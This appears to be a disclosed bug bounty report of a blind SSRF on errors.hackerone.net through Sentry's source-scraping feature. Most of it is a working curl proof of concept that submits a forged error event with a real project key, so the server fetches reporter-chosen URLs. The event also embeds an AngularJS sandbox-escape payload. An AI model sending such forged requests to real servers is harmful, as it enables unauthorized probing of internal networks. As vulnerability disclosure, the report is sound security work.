Blind SSRF on errors.hackerone.net due to Sentry misconfiguration

**Summary:** When setting up Sentry you should turn off "source code scrapping". If it is turned on, then server that has Sentry on it will make blind get requests everywhere controlled from outside via error reporting. **Description:** Hello Hackerone team. In your CSP I found ?sentry_key parameter, so it is obivious that you are using sentry to handle CSP reports. The regular route was ``` POST /api/30/csp-report/?sentry_key=61c1e2f50d21487c97a071737701f598 ``` However, you also can receive UI bug reports on different endpoint. Here it is: ``` POST /api/30/store/?sentry_version=7&sentry_client=raven-js%2F3.25.2&sentry_key=61c1e2f50d21487c97a071737701f598 ``` And here I remember that if Sentry "source code scrapping" is turned on, then server makes blind GET request to URL defined in "filename" parameter. Even inside intranet. So I tried to simulate error report with malformed "filename" parameter and got callback on my website from 54.186.141.19 IP. I am not 100% sure that it is not firewalled host, but lets try my luck with this report :) ### Steps To Reproduce 1. replace avtohanter.ru in following curl: ``` curl -i -s -k -X $'POST' \ -H $'Host: errors.hackerone.net' -H $'Connection: close' -H $'Content-Length: 9031' -H $'Origin: https://hackerone.com' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36' -H $'Content-Type: application/csp-report' -H $'Accept: */*' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7' \ --data-binary $'{\"project\":\"30\",\"logger\":\"javascript\",\"platform\":\"javascript\",\"request\":{\"headers\":{\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\",\"Referer\":\"https://avtohanter.ru/Business/Contractors/ContractorInfo?sessionid=40030075&id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c\"},\"url\":\"https://avtohanter.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075\"},\"exception\":{\"values\":[{\"type\":\"Error\",\"value\":\"Trying to get control scope but angular isn\'t ready yet or something like this\",\"stacktrace\":{\"frames\":[{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":110,\"colno\":81071,\"function\":\"XMLHttpRequest.o\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":75069,\"function\":\"XMLHttpRequest.<anonymous>\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":71510,\"function\":\"k\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":23681,\"function\":\"Object.fireWith [as resolveWith]\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":22924,\"function\":\"s\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":724721,\"function\":\"Object.n.(anonymous function) [as success]\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":725795,\"function\":\"Object.n.success\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":757703,\"function\":\"Object.executeInContext\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":725917,\"function\":\"?\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":723970,\"function\":\"c.json.c.toLowerCase.n.success.n.success\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075\",\"lineno\":2446,\"colno\":299,\"function\":\"ajaxOptions.success\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":313620,\"function\":\"NotificationCenter.<anonymous>\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":316137,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":542056,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":665829,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":666057,\"function\":\"NotificationCenterDropdown._scatter\",\"in_app\":true},{\"filename\":\"<anonymous>\",\"lineno\":null,\"colno\":null,\"function\":\"Array.forEach\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":666079,\"function\":\"?\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":714602,\"function\":\"ListClientBinding.output\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":713050,\"function\":\"ListClientBinding.output\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":448313,\"function\":\"NotificationCenterOuterList.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":683081,\"function\":\"NotificationCenterOuterList.getScope\",\"in_app\":true}]}}]},\"transaction\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"trimHeadFrames\":0,\"tags\":{\"AbonentId\":\"36053ca1-a898-43e3-90be-2bf69232bcf0\",\"UserId\":\"36053ca1-a898-43e3-90be-2bf69232bcf0\",\"OrganizationId\":\"c344ad73-f374-4bef-8629-8ebe1ebea57e\"},\"extra\":{\"session:duration\":357},\"breadcrumbs\":{\"values\":[{\"timestamp\":1530367897.368,\"category\":\"sentry\",\"message\":\"$parse:lexerr: Lexer Error: Unterminated quote at columns 47-67 [\'x=1} } };alert(1));] in expression [\'a\'.constructor.prototype.charAt=[].join;$eval(\'x=1} } };alert(1));].\",\"event_id\":\"57575ae92ea2477d8ba3665017601f81\",\"level\":\"error\"},{\"timestamp\":1530367897.373,\"message\":\"Error: [$parse:lexerr] Lexer Error: Unterminated quote at columns 47-67 [\'x=1} } };alert(1));] in expression [\'a\'.constructor.prototype.charAt=[].join;$eval(\'x=1} } };alert(1));].\\nhttp://errors.angularjs.org/1.5.8/$parse/lexerr?p0=Unterminated%20quote&p1=s%2047-67%20%5B\'x%3D1%7D%20%7D%20%7D%3Balert(1))%3B%5D&p2=\'a\'.constructor.prototype.charAt%3D%5B%5D.join%3B%24eval(\'x%3D1%7D%20%7D%20%7D%3Balert(1))%3B\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:365\\n at hr.throwError (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:75995)\\n at hr.readString (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:77352)\\n at hr.lex (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:74150)\\n at vr.ast (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:80676)\\n at Er.compile (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:85908)\\n at Or.parse (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:100573)\\n at c (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:101408)\\n at p (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:63437)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:42036\\n at oe (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:42291)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40233)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ee (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:39604)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9411\\n at c.$eval (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:111066)\\n at c.$apply (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:111299)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9371\\n at Object.invoke (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:24205)\\n at o (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9292)\\n at Object.xe [as bootstrap] (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9579)\\n at Object.bootstrap (https://elba.kontur.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js:1:633795)\\n at Function.run (https://elba.kontur.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js:1:38538)\\n at https://elba.kontur.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075:3511:21 undefined\",\"level\":\"error\",\"category\":\"console\"},{\"timestamp\":1530367897.415,\"category\":\"sentry\",\"message\":\"Error: Trying to get control scope but angular isn\'t ready yet or something like this\",\"event_id\":\"2da3183f684d4236b845f3b980c8fabe\",\"level\":\"error\"},{\"timestamp\":1530367897.455,\"category\":\"ui.click\",\"message\":\"input#ContractorRequisitesEdit_ContractorShortName_Input.c-input.c-input_elastic[type=\\\"text\\\"]\"},{\"timestamp\":1530367897.54,\"type\":\"http\",\"category\":\"xhr\",\"data\":{\"method\":\"POST\",\"url\":\"https://elba.kontur.ru/Support/PortalAuth/SetPortalAuthCookie?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionid=40030075\",\"status_code\":200}},{\"timestamp\":1530367897.577,\"type\":\"http\",\"category\":\"xhr\",\"data\":{\"method\":\"GET\",\"url\":\"https://elba.kontur.ru/Notices/NotificationCenter/GetViewData?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionid=40030075&_=1530367897217\",\"status_code\":200}}]},\"user\":{\"id\":\"36053ca1-a898-43e3-90be-2bf69232bcf0\"},\"release\":\"mobile_analitcs_redirect_fix e1293c0084a3\",\"event_id\":\"64eaf55f0b6942f6949d0ae00b4e002v\"}' \ $'https://errors.hackerone.net/api/30/store/?sentry_version=7&sentry_client=raven-js%2F3.25.2&sentry_key=61c1e2f50d21487c97a071737701f598' ``` 2. catch GET requests in access logs How to fix: turn off "scrap source code" in Sentry settings. ## Impact blind SSRF from errors.hackerone.net.